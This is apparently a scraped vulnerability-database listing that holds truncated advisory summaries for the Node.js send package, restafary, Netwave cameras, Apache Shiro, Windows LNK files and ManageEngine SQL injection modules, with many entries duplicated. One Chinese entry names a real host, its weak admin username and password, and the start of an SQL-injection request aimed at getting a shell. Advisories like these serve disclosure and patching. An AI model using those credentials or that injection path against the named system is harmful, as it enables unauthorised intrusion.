CVE-2016-10528

restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web. Restafary before 1.6.1 is able to set up a root path, which should only allow it to run inside of that root path it specified...

CVE-2016-10528

restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web. Restafary before 1.6.1 is able to set up a root path, which should only allow it to run inside of that root path it specified...

NETWAVE IP Camera Denial of Service Vulnerability

Netwave IP Camera devices is a network camera. A security vulnerability exists in Netwave IP Camera devices. An attacker can exploit this vulnerability to cause a denial of service crash by sending a POST request with a large body to the root path...

GHSA-JGQF-HWC5-HH37 Root Path Disclosure in send

Versions of send prior to 0.11.2 are affected by an information leakage vulnerability which may allow an attacker to enumerate paths on the server filesystem. Recommendation Update to version 0.11.1 or later...

LNK Code Execution Vulnerability

This module exploits a vulnerability in the handling of Windows Shortcut files .LNK that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 CVE-2015-0096. The created LNK file is similar except an additional SpecialFolderDataBlock is included. The...

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

UBUNTU-CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

AZL-45024 CVE-2015-8859 affecting package nodejs-nodemon 2.0.3-5

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

DEBIAN-CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVE-2015-8859

CVE-2015-8859 concerns the Node.js send package prior to 0.11.1, where an information leakage/root path disclosure vulnerability exists via unspecified vectors. Connected sources (GHSA-... and OSV entries) confirm this vulnerability, with remediation advised to upgrade to 0.11.1 or later. Affecte...

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVE-2016-6802

Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path...

PT-2017-7491 · Send +1 · Send +1

Name of the Vulnerable Software and Affected Versions: send versions prior to 0.11.1 Description: The issue allows attackers to obtain the root path via unspecified vectors, potentially enabling them to enumerate paths on the server filesystem. Recommendations: For versions prior to 0.11.1, updat...

GEOVAP Reliance 4 Control Server Privilege Escalation Vulnerability

GEOVAP Reliance 4 Control Server suffers from an unquoted search path issue impacting the service 'RelianceOpcDaWrapper' for Windows deployed as part of Reliance 4 SCADA/HMI system installer including Reliance OPC Server. This could potentially allow an authorized but non-privileged local user to...

用友某系统从弱口令到sql注射到getshell

简要描述： 弱口令、sql注射、getshell 详细说明： 系统地址： http://vip.ufida.com.cn/Frame/Index.aspx 弱口令帐号：adminnc 密码：adminnc 在自助查询处，发现注入（需要登录，注意cookie有时效） GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1 Accept: text/html, application/xhtml+xml, /...

ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection

This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet, which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and Password Manager Pro v6 build 6500 to v7 build 7002 including the MSP versions. The SQL injection can be used to achieve remot...

ManageEngine Password Manager MetadataServlet.dat SQL Injection Exploit

This Metasploit module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet, which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and Password Manager Pro v6 build 6500 to v7 build 7002 including the MSP versions. The SQL injection can be used to...